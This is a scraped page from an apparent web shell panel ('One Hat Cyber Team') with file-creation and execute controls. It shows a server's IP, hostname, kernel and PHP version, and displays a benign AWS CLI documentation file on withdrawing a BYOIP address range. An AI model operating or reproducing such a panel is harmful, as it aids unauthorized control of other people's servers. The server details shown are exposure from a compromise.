⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
awscli
/
examples
/
globalaccelerator
/
View File Name :
withdraw-byoip-cidr.rst
**To withdraw an address range** The following ``withdraw-byoip-cidr`` example withdraws an address range from AWS Global Accelerator that you previously advertised for use with your AWS resources. :: aws globalaccelerator withdraw-byoip-cidr \ --cidr 192.0.2.250/24 Output:: { "ByoipCidr": { "Cidr": "192.0.2.250/24", "State": "PENDING_WITHDRAWING" } } For more information, see `Bring your own IP address in AWS Global Accelerator
`__ in the *AWS Global Accelerator Developer Guide*.